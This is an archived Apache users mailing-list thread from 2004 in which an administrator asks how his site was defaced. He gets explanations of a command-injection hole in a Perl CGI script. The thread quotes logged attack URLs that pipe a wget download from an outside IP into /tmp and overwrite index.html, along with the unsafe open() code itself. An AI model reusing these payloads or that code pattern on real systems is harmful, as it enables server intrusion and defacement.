You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Murthy Ambaru <bo...@yahoo.com> on 2004/12/05 21:24:25 UTC
[users@httpd] Security Problem
I have a question regarding security. There is a web site that has an printer friendly version of web pages being dsiplayed using a CGI script. Apparently when this was in use, the site was hacked and some unwanted stuff posted on the site. I had a look at the access.log when this occurred and this was what showed up(I just replaced the site name with xyz, everything else is same):
/images/newswireprint.gif HTTP/1.0" 304 -
"http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v hosts/xyz.org/httpdocs/index.html|
Can anyone understand how are they able to hack? I tried reproducing it by typing in the above URL used by hackers, but could get nothing out of it. The permissions on all the html docs folders are set to 755.
Below is the CGI file being used. It basically strips images off. Can anyone help with this problem? what should i be looking at to plug off the security holes....Thanks a lot
-Murthy
#!/usr/local/bin/perl
print "Content-type: text/html\n\n";
&parseForm;
open(HEADER,"printheader.html") ;
my @HEADER = <HEADER>;
close(HEADER);
#print it! Put a # before print if you don't want a header printed...
print "@HEADER";
my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}
my @FILE = <FILE>;
close(FILE);
$print = 1 ;
foreach $line(@FILE) {
if ($line =~ /beginimage/) {
print $line ;
$print = 0;
next ;
}
if ($line =~ /endimage/) { $print = 1 ; }
if ($print eq "1") {
print $line;
}
}
########################################################
sub parseForm {
if ($ENV{'REQUEST_METHOD'} eq 'GET') {
# Split the name-value pairs
@pairs = split(/&/, $ENV{'QUERY_STRING'});
}
elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
# Split the name-value pairs
@pairs = split(/&/, $buffer);
}
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
# Un-Webify plus signs and %-encoding
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}
---------------------------------
Do you Yahoo!?
Meet the all-new My Yahoo! � Try it today!
Re: [users@httpd] Security Problem
Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
aha... if it is windows, just run an antivirus, ad-aware and look for
some strange proccesses.
The correct way is to read files only from a relative path. i.e. just
let the cgi access the files under /www/docs wirhouth having write
permissions, and parsing the url, so it does not includes ".." "." "|"
and no standar caracters. there are lots of other fixes too..
I'm not so good at perl, so i recommend you to google around and look to
other scripts. I hope someone here could lead you to fix this properly.
Murthy Ambaru wrote:
> Thanks Dick and Ivan for the input....Well the programmer who worked on
> this is no longer here. So would it be sufficient if i just check in the
> Parse form if the input file has any kind of weird characters (such as
> %, |, wget etc.) and if it does, redirect it somewhere else? Or should i
> check if the file exists in the system? I thought of doing this
> initially, but i could not reproduce what the hacker did by using the
> same command. I wanted to reproduce it and then correct the script and
> retest it again so as to be sure that it is fixed
> Also, this in not in linux (its windows), so what should i do to check
> that the system is not already compromised....thanks a lot
>
> */"Ivan Barrera A." <Br...@Ivn.cl>/* wrote:
>
> As i see, you take the parameter file from the URL without parsing it
> (as dick explained on other post too)
>
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
>
> You are not checking if the file is really valid, and are passing
> additional cmds without even noticing. (the pipe is really dangerous)
>
> As Dick said... ask your programmer to fix this right up. (and try to
> examine your machine.. it may be already comprimsed.. if in redhat run
> rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your
> good)
>
>
>
> Murthy Ambaru wrote:
> > Thanks for the explanation.So the file can be downloaded to
> /tmp/bind
> > directory in the server executing that script. As i said, i tried
> typing
> > in the URL used and got nothing. I did not check the /tmp/bind
> though(I
> > did not find that in the interface that i use to manage files on
> > server). So what would be an secure way of opening the file?
> > The script is in PERL. I am adding it below. Can you see anything
> weird
> > in it?? Thanks...
> >
> > #!/usr/local/bin/perl
> > print "Content-type: text/html\n\n";
> > &parseForm;
> > open(HEADER,"printheader.html") ;
> > my @HEADER = ;
> > close(HEADER);
> > #print it! Put a # before print if you don't want a header printed...
> > print "@HEADER";
> > my $data_file =
> > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > if (!open(FILE,"$data_file")) { die "Can't open";}
> > my @FILE = ;
> > close(FILE);
> > $print = 1 ;
> > foreach $line(@FILE) {
> > if ($line =~ /beginimage/) {
> > print $line ;
> > $print = 0;
> > next ;
> > }
> > if ($line =~ /endimage/) { $print = 1 ; }
> > if ($print eq "1") {
> > print $line;
> > }
> > }
> >
> > ########################################################
> > sub parseForm {
> > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > # Split the name-value pairs
> > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > }
> > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> >
> > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > # Split the name-value pairs
> > @pairs = split(/&/, $buffer);
> > }
> > foreach $pair (@pairs) {
> > ($name, $value) = split(/=/, $pair);
> > # Un-Webify plus signs and %-encoding
> > $value =~ tr/+/ /;
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > $FORM{$name} = $value;
> > }
> > }
> >
> >
> > */"Ivan Barrera A." /* wrote:
> >
> > I mean, the cgi script (which i dont know anything about) seems to
> > "open
> > " a file reffered by ?file= ... Probably an insecure way of "opening"
> > the file, leads to execute the rest of the statement.
> >
> > Look :
> >
> > ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
> >
> > After the correct page, a pipe, and wget http://blabla/bind
> -O/tmpbind
> > is appended. So , if the script execute this, the command wget will
> > exec, and download that file into /tmp/bind.
> > After that, using the same technique, you can exec anything you
> > want. so
> > the problem is the way of opening (or doing something else) to the
> > files
> > in the cgi script.
> > is it a c , perl , php , or any other language script ?
> >
> > Murthy Ambaru wrote:
> > > Thanks for the response Ivan. I am sorry i realy did not
> > understand what
> > > you mean by "download the file to /tmp/bind". when the printer
> > friendly
> > > link is clicked, this is the URL that will be accessed:
> > > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > > ofcourse it depends on the page being clicked at. So the file
> > name will
> > > be passed as parameter to the CGI file. I included the CGI code
> > in my
> > > earlier mail, could you please take a look.
> > > Thanks,
> > > Murthy
> > >
> > > */"Ivan Barrera A." /* wrote:
> > >
> > > the url you entered, download the file bind to /tmp/bind . It's
> > > probably
> > > an irc bot or a backdoor.
> > > If someone did that, the version of the cgi script, is
> unsecure, and
> > > should be revised.
> > >
> > > Im sorry if i didnt clarify enough, but would be useful to see
> > that cgi.
> > >
> > > Murthy Ambaru wrote:
> > > > I have a question regarding security. There is a web site that
> > > has an
> > > > printer friendly version of web pages being dsiplayed using a CGI
> > > > script. Apparently when this was in use, the site was hacked and
> > > some
> > > > unwanted stuff posted on the site. I had a look at the access.log
> > > when
> > > > this occurred and this was what showed up(I just replaced the
> > > site name
> > > > with xyz, everything else is same):
> > > >
> > > >
> > > > /images/newswireprint.gif HTTP/1.0" 304 -
> > > >
> > > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> > > >
> > > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| "
> "Mozilla/4.0
> > > >
> > > >
> > > > GET
> > > >
> > >
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > > > hosts/xyz.org/httpdocs/index.html|
> > > >
> > > > Can anyone understand how are they able to hack? I tried
> > > reproducing it
> > > > by typing in the above URL used by hackers, but could get nothing
> > > out of
> > > > it. The permissions on all the html docs folders are set to 755.
> > > >
> > > > Below is the CGI file being used. It basically strips images off.
> > > Can
> > > > anyone help with this problem? what should i be looking at to
> > > plug off
> > > > the security holes....Thanks a lot
> > > >
> > > > -Murthy
> > > >
> > > >
> > > >
> > > > #!/usr/local/bin/perl
> > > >
> > > > print "Content-type: text/html\n\n";
> > > >
> > > > &parseForm;
> > > >
> > > > open(HEADER,"printheader.html") ;
> > > > my @HEADER = ;
> > > > close(HEADER);
> > > > #print it! Put a # before print if you don't want a header
> > printed...
> > > > print "@HEADER";
> > > >
> > > > my $data_file =
> > > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > > >
> > > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > > my @FILE = ;
> > > > close(FILE);
> > > >
> > > > $print = 1 ;
> > > >
> > > > foreach $line(@FILE) {
> > > >
> > > > if ($line =~ /beginimage/) {
> > > > print $line ;
> > > > $print = 0;
> > > > next ;
> > > > }
> > > >
> > > > if ($line =~ /endimage/) { $print = 1 ; }
> > > >
> > > > if ($print eq "1") {
> > > > print $line;
> > > > }
> > > >
> > > > }
> > > >
> > > >
> > > > ########################################################
> > > >
> > > > sub parseForm {
> > > >
> > > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > > # Split the name-value pairs
> > > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > > }
> > > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > > >
> > > >
> > > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > > >
> > > > # Split the name-value pairs
> > > > @pairs = split(/&/, $buffer);
> > > > }
> > > > foreach $pair (@pairs) {
> > > > ($name, $value) = split(/=/, $pair);
> > > >
> > > > # Un-Webify plus signs and %-encoding
> > > > $value =~ tr/+/ /;
> > > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > > >
> > > > $FORM{$name} = $value;
> > > > }
> > > >
> > > > }
> > > >
> > > >
> > > >
> > > >
> > > >
> > >
> >
> ------------------------------------------------------------------------
> > > > Do you Yahoo!?
> > > > Meet the all-new My Yahoo! – Try it today!
> > >
> > >
> ---------------------------------------------------------------------
> > > The official User-To-User support forum of the Apache HTTP Server
> > > Project.
> > > See for more info.
> > > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > > For additional commands, e-mail: users-help@httpd.apache.org
> > >
> > >
> >
> ------------------------------------------------------------------------
> > > Do you Yahoo!?
> > > The all-new My Yahoo! – What will yours do?
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > See for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > Yahoo! Mail - 250MB free storage. Do more. Manage less.
> >
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Read only the mail you want - Yahoo! Mail SpamGuard
> <http://us.rd.yahoo.com/mail_us/taglines/spamguard/*http://promotions.yahoo.com/new_mail/static/protection.html>.
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security Problem
Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks Dick and Ivan for the input....Well the programmer who worked on this is no longer here. So would it be sufficient if i just check in the Parse form if the input file has any kind of weird characters (such as %, |, wget etc.) and if it does, redirect it somewhere else? Or should i check if the file exists in the system? I thought of doing this initially, but i could not reproduce what the hacker did by using the same command. I wanted to reproduce it and then correct the script and retest it again so as to be sure that it is fixed
Also, this in not in linux (its windows), so what should i do to check that the system is not already compromised....thanks a lot
"Ivan Barrera A." <Br...@Ivn.cl> wrote:
As i see, you take the parameter file from the URL without parsing it
(as dick explained on other post too)
my $data_file =
"/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}
You are not checking if the file is really valid, and are passing
additional cmds without even noticing. (the pipe is really dangerous)
As Dick said... ask your programmer to fix this right up. (and try to
examine your machine.. it may be already comprimsed.. if in redhat run
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your good)
Murthy Ambaru wrote:
> Thanks for the explanation.So the file can be downloaded to /tmp/bind
> directory in the server executing that script. As i said, i tried typing
> in the URL used and got nothing. I did not check the /tmp/bind though(I
> did not find that in the interface that i use to manage files on
> server). So what would be an secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird
> in it?? Thanks...
>
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = ;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = ;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
> if ($line =~ /endimage/) { $print = 1 ; }
> if ($print eq "1") {
> print $line;
> }
> }
>
> ########################################################
> sub parseForm {
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $FORM{$name} = $value;
> }
> }
>
>
> */"Ivan Barrera A."
/* wrote:
>
> I mean, the cgi script (which i dont know anything about) seems to
> "open
> " a file reffered by ?file= ... Probably an insecure way of "opening"
> the file, leads to execute the rest of the statement.
>
> Look :
>
> ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
>
> After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
> is appended. So , if the script execute this, the command wget will
> exec, and download that file into /tmp/bind.
> After that, using the same technique, you can exec anything you
> want. so
> the problem is the way of opening (or doing something else) to the
> files
> in the cgi script.
> is it a c , perl , php , or any other language script ?
>
> Murthy Ambaru wrote:
> > Thanks for the response Ivan. I am sorry i realy did not
> understand what
> > you mean by "download the file to /tmp/bind". when the printer
> friendly
> > link is clicked, this is the URL that will be accessed:
> > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > ofcourse it depends on the page being clicked at. So the file
> name will
> > be passed as parameter to the CGI file. I included the CGI code
> in my
> > earlier mail, could you please take a look.
> > Thanks,
> > Murthy
> >
> > */"Ivan Barrera A." /* wrote:
> >
> > the url you entered, download the file bind to /tmp/bind . It's
> > probably
> > an irc bot or a backdoor.
> > If someone did that, the version of the cgi script, is unsecure, and
> > should be revised.
> >
> > Im sorry if i didnt clarify enough, but would be useful to see
> that cgi.
> >
> > Murthy Ambaru wrote:
> > > I have a question regarding security. There is a web site that
> > has an
> > > printer friendly version of web pages being dsiplayed using a CGI
> > > script. Apparently when this was in use, the site was hacked and
> > some
> > > unwanted stuff posted on the site. I had a look at the access.log
> > when
> > > this occurred and this was what showed up(I just replaced the
> > site name
> > > with xyz, everything else is same):
> > >
> > >
> > > /images/newswireprint.gif HTTP/1.0" 304 -
> > >
> > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> > >
> > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> > >
> > >
> > > GET
> > >
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > > hosts/xyz.org/httpdocs/index.html|
> > >
> > > Can anyone understand how are they able to hack? I tried
> > reproducing it
> > > by typing in the above URL used by hackers, but could get nothing
> > out of
> > > it. The permissions on all the html docs folders are set to 755.
> > >
> > > Below is the CGI file being used. It basically strips images off.
> > Can
> > > anyone help with this problem? what should i be looking at to
> > plug off
> > > the security holes....Thanks a lot
> > >
> > > -Murthy
> > >
> > >
> > >
> > > #!/usr/local/bin/perl
> > >
> > > print "Content-type: text/html\n\n";
> > >
> > > &parseForm;
> > >
> > > open(HEADER,"printheader.html") ;
> > > my @HEADER = ;
> > > close(HEADER);
> > > #print it! Put a # before print if you don't want a header
> printed...
> > > print "@HEADER";
> > >
> > > my $data_file =
> > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > >
> > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > my @FILE = ;
> > > close(FILE);
> > >
> > > $print = 1 ;
> > >
> > > foreach $line(@FILE) {
> > >
> > > if ($line =~ /beginimage/) {
> > > print $line ;
> > > $print = 0;
> > > next ;
> > > }
> > >
> > > if ($line =~ /endimage/) { $print = 1 ; }
> > >
> > > if ($print eq "1") {
> > > print $line;
> > > }
> > >
> > > }
> > >
> > >
> > > ########################################################
> > >
> > > sub parseForm {
> > >
> > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > }
> > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > >
> > >
> > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > >
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $buffer);
> > > }
> > > foreach $pair (@pairs) {
> > > ($name, $value) = split(/=/, $pair);
> > >
> > > # Un-Webify plus signs and %-encoding
> > > $value =~ tr/+/ /;
> > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > >
> > > $FORM{$name} = $value;
> > > }
> > >
> > > }
> > >
> > >
> > >
> > >
> > >
> >
> ------------------------------------------------------------------------
> > > Do you Yahoo!?
> > > Meet the all-new My Yahoo! � Try it today!
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > See for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > The all-new My Yahoo! � What will yours do?
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail - 250MB free storage. Do more. Manage less.
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------
Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard.
Re: [users@httpd] Security Problem
Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
As i see, you take the parameter file from the URL without parsing it
(as dick explained on other post too)
my $data_file =
"/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}
You are not checking if the file is really valid, and are passing
additional cmds without even noticing. (the pipe is really dangerous)
As Dick said... ask your programmer to fix this right up. (and try to
examine your machine.. it may be already comprimsed.. if in redhat run
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your good)
Murthy Ambaru wrote:
> Thanks for the explanation.So the file can be downloaded to /tmp/bind
> directory in the server executing that script. As i said, i tried typing
> in the URL used and got nothing. I did not check the /tmp/bind though(I
> did not find that in the interface that i use to manage files on
> server). So what would be an secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird
> in it?? Thanks...
>
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
> if ($line =~ /endimage/) { $print = 1 ; }
> if ($print eq "1") {
> print $line;
> }
> }
>
> ########################################################
> sub parseForm {
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $FORM{$name} = $value;
> }
> }
>
>
> */"Ivan Barrera A." <Br...@Ivn.cl>/* wrote:
>
> I mean, the cgi script (which i dont know anything about) seems to
> "open
> " a file reffered by ?file= ... Probably an insecure way of "opening"
> the file, leads to execute the rest of the statement.
>
> Look :
>
> ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
>
> After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
> is appended. So , if the script execute this, the command wget will
> exec, and download that file into /tmp/bind.
> After that, using the same technique, you can exec anything you
> want. so
> the problem is the way of opening (or doing something else) to the
> files
> in the cgi script.
> is it a c , perl , php , or any other language script ?
>
> Murthy Ambaru wrote:
> > Thanks for the response Ivan. I am sorry i realy did not
> understand what
> > you mean by "download the file to /tmp/bind". when the printer
> friendly
> > link is clicked, this is the URL that will be accessed:
> > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > ofcourse it depends on the page being clicked at. So the file
> name will
> > be passed as parameter to the CGI file. I included the CGI code
> in my
> > earlier mail, could you please take a look.
> > Thanks,
> > Murthy
> >
> > */"Ivan Barrera A." /* wrote:
> >
> > the url you entered, download the file bind to /tmp/bind . It's
> > probably
> > an irc bot or a backdoor.
> > If someone did that, the version of the cgi script, is unsecure, and
> > should be revised.
> >
> > Im sorry if i didnt clarify enough, but would be useful to see
> that cgi.
> >
> > Murthy Ambaru wrote:
> > > I have a question regarding security. There is a web site that
> > has an
> > > printer friendly version of web pages being dsiplayed using a CGI
> > > script. Apparently when this was in use, the site was hacked and
> > some
> > > unwanted stuff posted on the site. I had a look at the access.log
> > when
> > > this occurred and this was what showed up(I just replaced the
> > site name
> > > with xyz, everything else is same):
> > >
> > >
> > > /images/newswireprint.gif HTTP/1.0" 304 -
> > >
> > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> > >
> > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> > >
> > >
> > > GET
> > >
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > > hosts/xyz.org/httpdocs/index.html|
> > >
> > > Can anyone understand how are they able to hack? I tried
> > reproducing it
> > > by typing in the above URL used by hackers, but could get nothing
> > out of
> > > it. The permissions on all the html docs folders are set to 755.
> > >
> > > Below is the CGI file being used. It basically strips images off.
> > Can
> > > anyone help with this problem? what should i be looking at to
> > plug off
> > > the security holes....Thanks a lot
> > >
> > > -Murthy
> > >
> > >
> > >
> > > #!/usr/local/bin/perl
> > >
> > > print "Content-type: text/html\n\n";
> > >
> > > &parseForm;
> > >
> > > open(HEADER,"printheader.html") ;
> > > my @HEADER = ;
> > > close(HEADER);
> > > #print it! Put a # before print if you don't want a header
> printed...
> > > print "@HEADER";
> > >
> > > my $data_file =
> > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > >
> > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > my @FILE = ;
> > > close(FILE);
> > >
> > > $print = 1 ;
> > >
> > > foreach $line(@FILE) {
> > >
> > > if ($line =~ /beginimage/) {
> > > print $line ;
> > > $print = 0;
> > > next ;
> > > }
> > >
> > > if ($line =~ /endimage/) { $print = 1 ; }
> > >
> > > if ($print eq "1") {
> > > print $line;
> > > }
> > >
> > > }
> > >
> > >
> > > ########################################################
> > >
> > > sub parseForm {
> > >
> > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > }
> > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > >
> > >
> > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > >
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $buffer);
> > > }
> > > foreach $pair (@pairs) {
> > > ($name, $value) = split(/=/, $pair);
> > >
> > > # Un-Webify plus signs and %-encoding
> > > $value =~ tr/+/ /;
> > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > >
> > > $FORM{$name} = $value;
> > > }
> > >
> > > }
> > >
> > >
> > >
> > >
> > >
> >
> ------------------------------------------------------------------------
> > > Do you Yahoo!?
> > > Meet the all-new My Yahoo! – Try it today!
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > See for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > The all-new My Yahoo! – What will yours do?
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail - 250MB free storage. Do more. Manage less.
> <http://us.rd.yahoo.com/evt=29915/*http://info.mail.yahoo.com/mail_250>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security Problem
Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks for the explanation.So the file can be downloaded to /tmp/bind directory in the server executing that script. As i said, i tried typing in the URL used and got nothing. I did not check the /tmp/bind though(I did not find that in the interface that i use to manage files on server). So what would be an secure way of opening the file?
The script is in PERL. I am adding it below. Can you see anything weird in it?? Thanks...
#!/usr/local/bin/perl
print "Content-type: text/html\n\n";
&parseForm;
open(HEADER,"printheader.html") ;
my @HEADER = <HEADER>;
close(HEADER);
#print it! Put a # before print if you don't want a header printed...
print "@HEADER";
my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}
my @FILE = <FILE>;
close(FILE);
$print = 1 ;
foreach $line(@FILE) {
if ($line =~ /beginimage/) {
print $line ;
$print = 0;
next ;
}
if ($line =~ /endimage/) { $print = 1 ; }
if ($print eq "1") {
print $line;
}
}
########################################################
sub parseForm {
if ($ENV{'REQUEST_METHOD'} eq 'GET') {
# Split the name-value pairs
@pairs = split(/&/, $ENV{'QUERY_STRING'});
}
elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
# Split the name-value pairs
@pairs = split(/&/, $buffer);
}
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
# Un-Webify plus signs and %-encoding
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}
"Ivan Barrera A." <Br...@Ivn.cl> wrote:
I mean, the cgi script (which i dont know anything about) seems to "open
" a file reffered by ?file= ... Probably an insecure way of "opening"
the file, leads to execute the rest of the statement.
Look :
?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
is appended. So , if the script execute this, the command wget will
exec, and download that file into /tmp/bind.
After that, using the same technique, you can exec anything you want. so
the problem is the way of opening (or doing something else) to the files
in the cgi script.
is it a c , perl , php , or any other language script ?
Murthy Ambaru wrote:
> Thanks for the response Ivan. I am sorry i realy did not understand what
> you mean by "download the file to /tmp/bind". when the printer friendly
> link is clicked, this is the URL that will be accessed:
> http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> ofcourse it depends on the page being clicked at. So the file name will
